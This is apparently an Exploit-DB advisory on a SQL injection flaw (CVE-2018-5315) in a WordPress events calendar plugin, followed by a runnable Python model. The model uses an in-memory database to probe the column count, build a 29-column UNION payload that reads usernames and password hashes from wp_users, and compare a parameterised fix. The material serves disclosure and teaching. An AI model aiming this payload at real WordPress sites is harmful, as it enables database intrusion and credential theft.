WordPress Plugin Events Calendar - 'event_id' SQL Injection

EDB-ID: 43479
Author: Dennis Veninga
Published: 2018-01-10
CVE: CVE-2018-5315
Type: Webapps
Platform: PHP
Vulnerable App: N/A

# Date: 09-01-2018
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: codecanyon.net/user/wachipi
# Version: 1.0
# CVE-ID: CVE-2018-5315

Events Calendar is a WordPress plugin that adds an interactive calendar to a
website for presenting events.

Found: 09-01-2018
Vendor reply & fix: 09-01-2018

The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
via the event_id parameter to event.php.

NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.

[Additional Information]

[Vulnerability Type]
SQL Injection

[Vendor of Product]
https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi

[Affected Product Code Base]
Events Calendar - 1.0

[Affected Component]
event.php, event_id parameter

[Attack Type]
Remote (the parameter is supplied in the HTTP request to event.php)

[Impact Information Disclosure]
The injected UNION SELECT returns database contents in the rendered page.
Code execution and privilege escalation are not demonstrated in this advisory.

[Attack Vectors]
The vulnerable SELECT returns 29 columns, so a UNION SELECT injected through
event_id must supply exactly 29 columns or the database rejects it with a
column-count error. Of those 29, columns 2 and 25 are rendered in the page, so
an expression placed in either position is returned to the attacker.
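An added, runnable model of the bug class described above (example code written for this page, not the plugin's own code and not the author's proof of concept): a vulnerable lookup that concatenates event_id into the query text, an ORDER BY probe that recovers the column count, the UNION SELECT payload padded to 29 columns with columns 2 and 25 carrying the data, and a parameterised lookup that the same payload cannot affect. The events table layout, the made-up wp_users row, the -1 prefix and the unquoted numeric context are constructed assumptions, and SQLite stands in for MySQL (so MySQL-only expressions such as @@version are not used).

```python
import sqlite3

COLUMN_COUNT = 29     # from the advisory: the vulnerable SELECT returns 29 columns
REFLECTED = (2, 25)   # from the advisory: columns 2 and 25 are rendered in the page


def build_union_payload(expressions, table=None, column_count=COLUMN_COUNT, prefix="-1"):
    """Return an event_id value that UNIONs attacker-chosen expressions into the query.

    expressions: {1-based column position: SQL expression}; every other position is
                 padded with NULL so the column count matches the original SELECT.
    table:       optional FROM target for the injected SELECT.
    prefix:      a value matching no real row, so only the injected row is rendered
                 (assumption: event_id is spliced in unquoted, i.e. a numeric context).
    """
    cols = [expressions.get(i, "NULL") for i in range(1, column_count + 1)]
    from_clause = f" FROM {table}" if table else ""
    return f"{prefix} UNION SELECT {', '.join(cols)}{from_clause}-- -"


def make_db(column_count=COLUMN_COUNT):
    """Constructed stand-in for the plugin's database (SQLite here, MySQL in WordPress).

    The events table gets 29 generic columns; wp_users holds one made-up row.
    """
    conn = sqlite3.connect(":memory:")
    names = ["id"] + [f"c{i}" for i in range(2, column_count + 1)]
    conn.execute(f"CREATE TABLE events ({', '.join(names)})")
    conn.execute(
        f"INSERT INTO events VALUES ({', '.join('?' * column_count)})",
        [1] + [f"v{i}" for i in range(2, column_count + 1)],
    )
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructedhash')")
    return conn


def lookup_event_vulnerable(conn, event_id):
    """The bug class the advisory reports: event_id is concatenated into the SQL text."""
    sql = "SELECT * FROM events WHERE id = " + str(event_id)
    return conn.execute(sql).fetchall()


def lookup_event_fixed(conn, event_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL.

    In a WordPress plugin the equivalent is $wpdb->prepare() with a %d placeholder.
    """
    return conn.execute("SELECT * FROM events WHERE id = ?", (event_id,)).fetchall()


def render(rows, reflected=REFLECTED):
    """Stand-in for event.php output: only the reflected columns reach the HTML."""
    return [tuple(row[i - 1] for i in reflected) for row in rows]


def find_column_count(conn, max_cols=64):
    """One common way to establish the column count (the advisory reports 29):
    ORDER BY n succeeds while n <= column count and errors once it exceeds it.
    Against a live target the signal is an SQL error or an empty page instead.
    """
    count = 0
    for n in range(1, max_cols + 1):
        try:
            lookup_event_vulnerable(conn, f"1 ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            break
        count = n
    return count


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(db))
    payload = build_union_payload({2: "user_login", 25: "user_pass"}, table="wp_users")
    print("event_id=" + payload)
    print("vulnerable:", render(lookup_event_vulnerable(db, payload)))
    print("fixed:     ", render(lookup_event_fixed(db, payload)))
```

The vulnerable lookup returns the injected wp_users row in positions 2 and 25, while the parameterised lookup treats the whole payload as an opaque value and returns nothing. If the real query quotes event_id, the prefix would need to close that quote first; the advisory does not say which case applies, so the example assumes the numeric one.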

Dennis Veninga @ Networking4all.com